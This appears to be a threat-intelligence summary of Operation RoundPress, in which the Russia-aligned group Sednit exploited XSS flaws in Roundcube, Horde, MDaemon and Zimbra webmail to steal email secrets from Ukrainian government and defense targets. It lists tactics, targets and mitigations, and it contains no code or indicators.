Full Report
Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU
Analysis Summary
# Threat Actor: Sednit (Operation RoundPress)
## Attribution & Identity
Attributed by ESET researchers as the Russia-aligned APT group **Sednit**.
## Activity Summary
The specific campaign highlighted is **Operation RoundPress**. This operation targets webmail software to steal secrets from email accounts. Initially targeting Roundcube, the actors expanded their focus to include Horde, MDaemon, and Zimbra webmail software. The threat actors successfully bypassed two-factor authentication (2FA) in some instances.
## Tactics, Techniques & Procedures
- Abusing Cross-Site Scripting (XSS) vulnerabilities in webmail software.
- Exploitation of a **zero-day XSS flaw** in **MDaemon webmail software**.
- Targeting Roundcube, Horde, MDaemon, and Zimbra webmail platforms.
- Circumvention of Two-Factor Authentication (2FA).
- Primary objective is exfiltration of confidential information/secrets from email accounts.
## Targeting
- Sectors: Governmental organizations and Defense contractors.
- Geography: Officials working for various governmental organizations in **Ukraine**, and defense contractors in **Europe and on other continents**.
- Victims: Specific governmental organizations and defense companies whose email accounts were compromised.
## Tools & Infrastructure
- Malware families used: Not explicitly detailed, but tools used focused on XSS exploitation of mail servers.
- Infrastructure (C2, domains, IPs): No specific IOCs (IPs/domains) were provided in the summary text.
## Implications
Sednit remains an active threat actor primarily focused on espionage, leveraging sophisticated techniques like zero-day exploitation (XSS) against widely used communication infrastructure (webmail) to gain access to sensitive government and defense data. Their ability to bypass 2FA indicates a high level of operational maturity.
## Mitigations
- Patch or update all instances of webmail software, specifically Roundcube, Horde, MDaemon, and Zimbra, particularly addressing known XSS vulnerabilities.
- Review and verify the security of 2FA implementation, ensuring it cannot be bypassed by application-layer exploits like XSS.
- Implement strict endpoint and network monitoring for anomalous behavior associated with email account credential harvesting or session hijacking.